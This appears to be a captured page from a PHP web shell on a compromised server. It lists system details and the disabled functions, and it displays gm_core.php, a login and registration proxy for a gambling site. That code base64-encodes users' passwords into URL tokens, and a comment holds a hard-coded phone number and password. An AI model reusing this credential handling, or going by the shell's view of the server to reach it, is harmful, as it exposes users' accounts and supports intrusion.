HEX
Server: Apache/2
System: Linux other-wp 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User: admin (1004)
PHP: 7.4.28
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/admin/domains/scbdefi.com/private_html/
Upload Files
File: /home/admin/domains/scbdefi.com/private_html/gm_core.php
<?php

//print_r($_POST);
//print_r($_GET);
$loginURL = "https://game-mun-api-production-qhqdywr4hq-as.a.run.app/v1/auth/login";
$registerURL = "https://game-mun-api-production-qhqdywr4hq-as.a.run.app/v1/user";

/*$login=[
	"phone_number"=>"0896361559",
	"password"=>"qwerty12345"
];*/

switch ($_GET["cmd"]) {
	case "login":
	{
		$phone_number = $_POST["phone_number"];
		$password = $_POST["password"];
		//echo "<pre>";
		//print_r($login);
		//echo "</pre>";

		//$phone_number = $login["phone_number"];
		//$password = $login["password"];
		
		$data = [
			"username" => $phone_number,
			"password" => $password
		];
		
		$token=base64_encode(json_encode($data));
		$goURL = 'https://web.gamemun.bet/login?token='.$token;
		echo '<script>window.location="'.$goURL.'"</script>';
		exit;
		

		$ch = curl_init();
		$headers = [
			'Content-Type: application/json'
		];
		$postData = [
			'phone_number' => $phone_number,
			'password' => $password,
			'username_tag' => 'gb'
		];
		curl_setopt($ch, CURLOPT_URL, $loginURL);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($postData));
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
		$result = curl_exec($ch);
		$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

		//echo '<br><br>Response <hr>';
		$result = json_decode($result);
		//echo "<pre>";
		//print_r($result);
		//echo "</pre>";
		//echo '<hr>';

		if (!empty($result->error_code)) {
			switch ($result->error_code) {
				case 403:
				{
					if($result->error_message=='Error Password Incorrect'){
						echo "รหัสผ่านไม่ถูกต้อง <a href='./'>กลับไปป้อนใหม่</a>";
					}
				}
			}
		} else {
			$goURL = 'https://web.gamemun.bet/register?token='.$result->data->token->accessToken.'&refreshToken='.$result->data->token->refreshToken;
			//echo $goURL;
			//header( "location: $goURL");
			//exit(0);
			echo '<script>window.location="'.$goURL.'"</script>';

		}

		break;
	}
	case "register":{
		$phone_number = $_POST["phone_number"];
		$password = $_POST["password"];

		$ch = curl_init();
		$headers = [
			'Content-Type: application/json'
		];
		$postData = [
			'phone_number' => $phone_number,
			'password' => $password,
			'username_tag' => 'gb'
		];
		curl_setopt($ch, CURLOPT_URL, $registerURL);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($postData));
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
		$result = curl_exec($ch);
		$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

		//echo '<br><br>Response <hr>';
		$result = json_decode($result);
		//echo "<pre>";
		//print_r($result);
		//echo "</pre>";
		//echo '<hr>';

		if (!empty($result->error_code)) {
			switch ($result->error_code) {
				case 403:
				{
					if($result->error_message=='Error Password Incorrect'){
						echo "ข้อมูลไม่ถูกต้อง <a href='./'>กลับไปป้อนใหม่</a>";
					}
					break;
				}
				case 402:{
					if($result->error_message=='Error Duplicate User'){
						echo "มีสมาชิกนี้อยู่ในระบบแล้ว <a href='./'>กลับไปป้อนใหม่</a>";
					}
					break;
				}
			}
		} else {
			$goURL = 'https://web.gamemun.bet/register?token='.$result->data->token->accessToken.'&refreshToken='.$result->data->token->refreshToken;
			//header( "location: $goURL");
			//exit(0);
			echo '<script>window.location="'.$goURL.'"</script>';

		}

		break;
	}
	default:
	{
		echo "request command";
	}
}
?>
@ Telegram